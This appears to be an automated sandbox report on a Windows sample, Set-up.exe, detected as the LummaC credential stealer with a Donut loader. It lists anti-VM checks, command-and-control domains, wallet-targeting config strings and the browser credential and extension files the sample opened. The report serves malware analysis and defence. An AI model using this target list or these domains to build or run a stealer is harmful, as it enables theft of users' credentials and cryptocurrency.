              Source: unknownHTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49745 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: Set-up.exeStatic PE information: invalid certificate
              Source: Set-up.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: Set-up.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Set-up.exe, 00000000.00000003.1782955917.0000000003F05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Set-up.exeVirustotal: Detection: 7%
              Source: Set-up.exeReversingLabs: Detection: 13%
              Source: Set-up.exeString found in binary or memory: -h, --help display this help and exit
              Source: Set-up.exeString found in binary or memory: -h, --help display this help and exit
              Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Users\user\Desktop\Set-up.exeJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: Set-up.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: Set-up.exeStatic file information: File size 73935792 > 1048576
              Source: Set-up.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2c9600
              Source: C:\Users\user\Desktop\Set-up.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\Set-up.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exe TID: 6456Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exe TID: 2188Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: Set-up.exe, 00000000.00000002.1910542741.0000000000D43000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1910542741.0000000000D78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\Set-up.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: Set-up.exe, 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: truculengisau.biz
              Source: Set-up.exe, 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: spookycappy.biz
              Source: Set-up.exe, 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: punishzement.biz
              Source: Set-up.exe, 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: nuttyshopr.biz
              Source: Set-up.exe, 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: marketlumpe.biz
              Source: Set-up.exe, 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: littlenotii.biz
              Source: Set-up.exe, 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: grandiouseziu.biz
              Source: Set-up.exe, 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: fraggielek.biz
              Source: Set-up.exe, 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: rampnatleadk.click
              Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Set-up.exe, 00000000.00000003.1857255847.0000000000DF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 7104, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: Set-up.exe, 00000000.00000003.1851921420.0000000000DD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p"ce
              Source: Set-up.exe, 00000000.00000002.1910770861.0000000000DD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ta%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCFe
              Source: Set-up.exe, 00000000.00000002.1910770861.0000000000DD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: afln","ez":"Guarda"},{"en":"blnieiiffboillknjnepogjhkgnoapac","ez":"EQUA"},{"en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","ez":"BitApp"},{"en":"kncchdig
              Source: Set-up.exe, 00000000.00000003.1841233829.0000000000DDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
              Source: Set-up.exe, 00000000.00000003.1841233829.0000000000DDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Set-up.exe, 00000000.00000003.1841233829.0000000000DDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
